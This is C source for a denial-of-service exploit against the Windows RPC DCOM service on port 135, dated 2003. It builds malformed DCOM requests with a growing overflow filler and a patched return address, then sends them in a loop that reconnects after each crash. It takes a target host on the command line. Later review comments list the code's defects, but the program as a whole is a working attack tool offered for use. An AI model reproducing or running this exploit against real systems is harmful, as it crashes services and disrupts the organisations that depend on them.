
/*
* Windows RPC DCOM Dos exploit
* by bkbll bkbll@cnhonker.net, 2003/08/07
* http://www.cnhonker.com
* modified the code from oc192 Security
*
* Usage:
* cl dcomdos.cpp
* dcomdos -d 10.10.10.135 -n 3000
*/

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <process.h>
#include <winsock2.h>
#include <windows.h>
#include <io.h>
#include <conio.h>
#include <fcntl.h>
#include <signal.h>

#pragma comment(lib,"ws2_32")

#define VER "2.3_beta"   /* version string echoed in main()'s banner */
int num=1;               /* filler length for the current iteration: set by -n, incremented after each send in main(), printed by sig() */

/* xfocus start */
/* Opaque protocol bytes copied from the xfocus code. main() sends this
 * array unmodified at the start of every iteration; nothing patches it. */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

/* Opaque protocol bytes copied from the xfocus code. main() copies this
 * array to the head of buf2 on every iteration and then adjusts several
 * 32-bit words of buf2 at fixed offsets; the array itself is never
 * modified, so each iteration starts from the same template. */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};

/* Opaque protocol bytes copied from the xfocus code. Unlike request1, main()
 * adjusts the 32-bit words at offsets 0 and 8 of this global *in place* on
 * every iteration and never restores them, so the adjustment accumulates
 * across iterations (maintenance note: the array is not a pristine template). */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};

/* Opaque protocol bytes copied from the xfocus code; main() appends this
 * array to buf2 directly after the filler, unmodified. */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
/* end xfocus */

/* Head of the filler that main() builds into sc[]: 36 bytes of text
 * (12 + 16 + 8) followed by three 32-bit values. main() overwrites bytes
 * 36..39 -- the "return address" slot below -- with targets[type].ret before
 * use, then appends num bytes of 'C'. Being a string literal, sizeof(scc)
 * counts the terminating NUL; main() uses sizeof(scc)-1 as the byte count. */
unsigned char scc[]=
  "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
  "\x46\x00\x58\x00\x46\x00\x58\x00"

  "\xff\xff\xff\xff" /* return address */
 
  "\xcc\xe0\xfd\x7f" /* primary thread data block */
  "\xcc\xe0\xfd\x7f"; /* primary thread data block */

  /* bindshell no RPC crash, defineable spawn port */

/* xfocus start */
/* Opaque protocol bytes copied from the xfocus code; main() appends this
 * array last to buf2, unmodified. */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
/* end xfocus */
int type=0;      /* index into targets[]; only entry 0 exists and nothing in this file changes it */
struct
{
char *os;        /* human-readable label; never printed in this file */
u_long ret;      /* 32-bit value that main() memcpy()s over bytes 36..39 of scc */
}
targets[] =
{
// { "[Win2k-Universal]", 0x0018759F },
{ "[Win2k/XP-Universal]", 0x0100139d },
}, v;            /* 'v' is a second instance of the anonymous struct; nothing in this file references it */
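char *optarg = NULL;   /* argument of the option just returned, or NULL */
int  optind = 1;       /* index of the next argv element to examine */
int  opterr = 1;       /* non-zero: errors are reported as '?' rather than as the offending letter */

/*
 * Minimal getopt(3) replacement for toolchains that lack one.
 *
 * Options are introduced by '-' or '/'. A letter followed by ':' in
 * opstring takes an argument, either attached ("-p135") or as the next
 * argv element ("-p 135"); letters without ':' may be grouped ("-vd").
 *
 * Returns the option letter; '?' for an unknown letter, a bare ':' or a
 * missing argument (with opterr == 0 the offending letter is returned
 * instead, ':' for a bare ':'); EOF at the first non-option, at "-"/"--",
 * or when argv is exhausted. optarg and optind are updated accordingly.
 *
 * Differences from the previous version: opstring is const-qualified; the
 * reserved-name helper macro is gone; every early return leaves the static
 * group pointer either NULL or inside the current argv element, so a later
 * call can never step past the end of an argv string that was already
 * finished (the old ':' path left it dangling); a ':' inside a group now
 * continues the group, like an unknown letter inside a group does.
 */
int getopt(int argc, char *argv[], const char *opstring)
{
  static char *group = NULL;   /* position inside a "-abc" group from the previous call */
  char *cur = NULL;            /* option letter under examination */

  if (group != NULL && *(++group) != '\0')
    {
      cur = group;             /* more letters left in the current group */
  }

  if (cur == NULL)
    {
      if (optind >= argc)
        {
          group = NULL;
          return EOF;          /* all of argv consumed */
      }
      cur = argv[optind++];

      if (*cur != '/' && *cur != '-')
        {
          --optind;            /* leave the non-option for the caller */
          optarg = NULL;
          group = NULL;
          return EOF;
      }

      if (strcmp(cur, "-") == 0 || strcmp(cur, "--") == 0)
        {
          optarg = NULL;
          group = NULL;
          return EOF;          /* explicit end of options */
      }

      cur++;                   /* step over the '-' or '/' */
  }

  if (*cur == ':')
    {
      /* ':' is never an option letter. Keep scanning the same argv element
       * next time, so the static pointer never refers to a finished string. */
      optarg = NULL;
      group = cur;
      return opterr ? '?' : ':';
  }

  const char *spec = strchr(opstring, *cur);
  if (spec == NULL)
    {
      optarg = NULL;
      group = NULL;
      return opterr ? '?' : (int)*cur;   /* not in opstring */
  }

  if (spec[1] != ':')
    {
      optarg = NULL;
      group = cur;             /* flag without argument: may be grouped */
      return (int)*cur;
  }

  /* The option takes an argument: attached text wins, else the next argv element. */
  if (cur[1] != '\0')
    {
      optarg = &cur[1];
  }
  else if (optind < argc)
    {
      optarg = argv[optind++];
  }
  else
    {
      optarg = NULL;
      group = NULL;
      return opterr ? '?' : (int)*cur;   /* argument missing */
  }
  group = NULL;
  return (int)*cur;
}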

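/*
 * Print the command-line synopsis to stdout and terminate the process.
 *
 * prog: argv[0], echoed in the synopsis line (read only, hence const).
 * Does not return: exits with status 0 regardless of why it was called.
 */
void usage(const char *prog)
{
  printf("Usage:\n\n");
  printf("%s -d <host> [options]\n", prog);
  printf("Options:\n");
  printf("    -d:        Hostname to attack [Required]\n");
  printf("    -p:        Attack port [Default: 135]\n");
  printf("    -n:        offset.\n");
  exit(0);
}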

/*
 * SIGINT handler: report the iteration counter reached so far and quit.
 * The signal number is not used.
 */
void sig(int j)
{
    (void)j;
    fputs("\n[-] Received Ctrl+c\n", stdout);
    printf("num=%d\n", num);
    exit(0);
}

/*
 * Entry point of this 2003-era RPC/DCOM denial-of-service test tool.
 *
 * Parses -d <host> (required), -p <port> (default 135) and -n <count>,
 * resolves the host, connects, and then loops: every iteration sends
 * bindstr, reads one reply, and sends buf2 = request1 + request2 +
 * (scc with targets[type].ret patched in, followed by num bytes of 'C')
 * + request3 + request4, incrementing num each time. The loop ends only
 * when send() fails; a refused connect() is retried every 8 s.
 *
 * Returns 0 on the normal exit paths, 1 on a bad -p value or an unknown
 * option; usage() and the hostname checks call exit() directly.
 *
 * Defects noted during review (left as-is; see inline NOTE(review) lines):
 * unbounded copies into fixed-size buffers, an ineffective port range
 * check, an unchecked recv(), and unaligned 32-bit stores through char
 * buffers.
 */
int main(int argc, char **argv)
{
  int len, len1, c;
  unsigned short port = 135;
  /* NOTE(review): buf2 is 0x1000 bytes but len1 grows by sizeof(scc)-1 + num
   * plus the four request arrays with no bound check (see the memcpy chain
   * below); a large -n overruns buf2. Likewise sc is 40000 bytes and the
   * 'C' fill of num bytes is not checked against that size. */
  char buf1[0x1000];
  char buf2[0x1000];
  // unsigned short lportl=666,lports; /* drg */
  //char lport[] = "\x00\xFF\xFF\x8b"; /* drg */

  struct hostent *he;
  struct sockaddr_in their_addr;
  static char *hostname=NULL;
  SOCKET sockfd;
    WSADATA wsd;
    /* conbackhost / conbackport / conbackportl are never assigned anywhere
     * in this file (the option switch only handles d, p and n), so the two
     * "connecting back" checks further down can never fire; leftovers from
     * the code this was derived from. */
    static    char *conbackhost=NULL;
    unsigned short conbackport=0;
    unsigned short conbackportl=0;
  //unsigned long ip;
  unsigned char sc[40000];
    int alllen=0,add90len=0;;   /* add90len is written once below and never read */
  signal(SIGINT,&sig);   /* sig() prints num and exits on Ctrl+C */

  printf("RPC DCOM DoS exploit(%s) coded by bkbll <bkbll@cnhonker.net>, 2003/08/07\r\nModified from oc192 Security\n",VER);


    /* NOTE(review): perror() reports errno, which Winsock calls do not set;
     * WSAGetLastError() (used later in this function) is the relevant source. */
    if(WSAStartup(MAKEWORD(2,2),&wsd)!=0) 
  { 
        perror("WSAStartup error");
        exit(0);
    } 
 
  if(argc<2)
  {
    usage(argv[0]);   /* usage() exits; nothing after this runs */
  }

  while((c = getopt(argc, argv, "d:p:n:"))!= EOF)
  {
          switch (c)
          {
                case 'd':
                      hostname = optarg;
                      break;
                case 'p':
                      /* NOTE(review): port is unsigned short, so atoi() results
                       * above 65535 wrap before the comparison and
                       * "port > 65535" is always false; only 0 is rejected. */
                      port = atoi(optarg);
                      if((port > 65535) || (port < 1))
                      {
                        printf("[-] Select a port between 1-65535\n");
                        return 1;
                      }
                      break;
                case 'n':
                      num = atoi(optarg);   /* starting filler length; no range check */
                      break;
                default:
                      usage(argv[0]);
                      return 1;             /* unreachable: usage() exits */
          }
  }
 
  if(hostname==NULL)
  {
    printf("[-] Please enter a hostname with -d\n");
    exit(1);
  }
  /* Dead checks: see the note at the conback* declarations above. */
  if((conbackport==0) && (conbackhost!=NULL))
    {
        printf("[-] U must give me a port for connecting back\n");
        exit(1);
    }
    if((conbackport>0) && (conbackhost==NULL))
    {
        printf("[-] U must give me a host for connecting back\n");
        exit(1);
    }

  /* Offset 36 is the "\xff\xff\xff\xff" slot of scc (12 + 16 + 8 text bytes
   * precede it); the 4 bytes of targets[type].ret replace it. */
  memcpy(scc+36, (unsigned char *) &targets[type].ret, 4);
    printf("[+] Resolving host..");
      fflush(stdout);
  if((he = gethostbyname(hostname)) == NULL)
  {
      printf("Failed\n");
        printf("[-] gethostbyname: Couldnt resolve hostname\n");
    exit(1);
  }

  printf("Done.\n");
  their_addr.sin_family = AF_INET;
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);   /* first resolved address only */
  their_addr.sin_port = htons(port);
AGAIN:   /* re-entered with a fresh socket after a non-reset send() failure */
  if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) == INVALID_SOCKET)
  {
      perror("[-] Socket failed");
      return(0);
  }
CONN:   /* re-entered every 8 s while connect() keeps failing */
  printf("[+] Connecting to %s:%d.....",hostname,port);
 
    /* NOTE(review): on failure the same socket handle is reused for the next
     * connect(); whether Winsock allows that after a failed connect is not
     * established here -- confirm, or recreate the socket via AGAIN. */
    if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == SOCKET_ERROR)
  {
      printf("Failed\n");
        perror("[-] Connect failed");
        printf("Crashed,num=%d\n",num);
        printf("[+] waiting server restart\r\n");
        Sleep(8000);
        goto CONN;
      //return(0);
  }
    printf("ok\n");
  /* Main send loop. alllen is the filler length (scc text + num 'C's) and
   * is reset to 0 at the end of every iteration; len1 is the total buf2 length. */
  while(1)
    {
        memset(sc,0,40000);
        memcpy(sc,scc,sizeof(scc));
        alllen+=sizeof(scc)-1;
        add90len=num;
        memset(sc+alllen,'C',num);   /* NOTE(review): no check that alllen + num <= sizeof sc */
        alllen+=num;
        memcpy(buf2,request1,sizeof(request1));
        len1=sizeof(request1);
 
        /* These two adjust the *global* request2 in place; it is never
         * restored, so the added alllen/2 accumulates across iterations.
         * The buf2 adjustments further down do not, because buf2 is rebuilt
         * from request1 each time. */
        *(unsigned long *)(request2)=*(unsigned long *)(request2)+alllen/2; 
        *(unsigned long *)(request2+8)=*(unsigned long *)(request2+8)+alllen/2;
 
        /* NOTE(review): none of these copies is bounded by sizeof buf2. */
        memcpy(buf2+len1,request2,sizeof(request2));
        len1=len1+sizeof(request2);
        memcpy(buf2+len1,sc,alllen);
        len1=len1+alllen;
        memcpy(buf2+len1,request3,sizeof(request3));
        len1=len1+sizeof(request3);
        memcpy(buf2+len1,request4,sizeof(request4));
        len1=len1+sizeof(request4);
 
        /* Fixed-offset 32-bit fields inside the request1 part of buf2 are
         * increased by alllen-0xc. NOTE(review): these are unaligned stores
         * through an unsigned long* into a char buffer (strict-aliasing and
         * alignment concerns; memcpy would be the portable form). */
        *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+alllen-0xc;
        *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+alllen-0xc; 
        *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+alllen-0xc;
        *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+alllen-0xc;
        *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+alllen-0xc;
        *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+alllen-0xc;
        *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+alllen-0xc;
        *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+alllen-0xc;
        /* end xfocus */
        alllen=0;
        /* Error policy for both send() calls: any error other than
         * WSAECONNRESET is treated as the peer closing the socket -> new
         * socket via AGAIN; a reset is reported and (here) ends the loop. */
        if (send(sockfd,(const char *)bindstr,sizeof(bindstr),0)== SOCKET_ERROR)
        {
            if(WSAGetLastError()!=WSAECONNRESET)
            {
                printf("Target close the socket\r\n");
                closesocket(sockfd);
                goto AGAIN;
            }
            else
            {
                printf("[-] Send failed.........");
                printf("error:%d\r\n",WSAGetLastError());
                break;
            }
        }
        /* NOTE(review): the reply is read into buf1 but len is never checked
         * (SOCKET_ERROR / 0 on close) nor used afterwards. */
        len=recv(sockfd, buf1, 1000, 0);
 
        if (send(sockfd,buf2,len1,0)== SOCKET_ERROR)
        {
            if(WSAGetLastError()!=WSAECONNRESET)
            {
                printf("Target close the socket\r\n");
                closesocket(sockfd);
                goto AGAIN;
            }
            else
            {
                /* Unlike the bindstr path, a reset here reconnects instead
                 * of breaking; note the old sockfd is not closed first. */
                printf("[-] Send failed.....");
                printf("error:%d\r\n",WSAGetLastError());
                printf("crashed,num=%d\r\n",num);
                goto AGAIN;
            }
        }
        num++;   /* next iteration uses one more filler byte */
    }
    printf("crashed,num=%d\r\n",num);
    closesocket(sockfd);
    WSACleanup();
  return(0);
}


